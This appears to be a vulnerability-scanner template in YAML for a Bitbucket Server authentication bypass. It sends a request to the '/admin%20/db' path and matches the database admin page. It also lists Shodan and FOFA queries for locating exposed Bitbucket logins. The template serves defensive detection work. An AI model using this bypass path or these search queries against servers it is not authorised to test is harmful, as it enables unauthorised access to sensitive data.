35 lines
947 B
YAML
35 lines
947 B
YAML
|
id: bitbucket-auth-bypass
|
||
|
|
||
|
info:
|
||
|
name: Bitbucket Server > 4.8 - Authentication Bypass
|
||
|
author: DhiyaneshDk
|
||
|
severity: critical
|
||
|
description: |
|
||
|
There is a permission bypass vulnerability through %20, which allows arbitrary users to obtain sensitive data
|
||
|
reference:
|
||
|
- https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/Atlassian%20Bitbucket%20%E7%99%BB%E5%BD%95%E7%BB%95%E8%BF%87%E6%BC%8F%E6%B4%9E.md
|
||
|
metadata:
|
||
|
max-request: 1
|
||
|
verified: true
|
||
|
fofa-query: title="Log in - Bitbucket"
|
||
|
shodan-query: title:"Log in - Bitbucket"
|
||
|
tags: misconfig,atlassian,bitbucket,auth-bypass
|
||
|
|
||
|
http:
|
||
|
- method: GET
|
||
|
path:
|
||
|
- "{{BaseURL}}/admin%20/db"
|
||
|
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
- type: word
|
||
|
part: body
|
||
|
words:
|
||
|
- "<h2>Database</h2>"
|
||
|
- "Migrate database"
|
||
|
condition: and
|
||
|
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|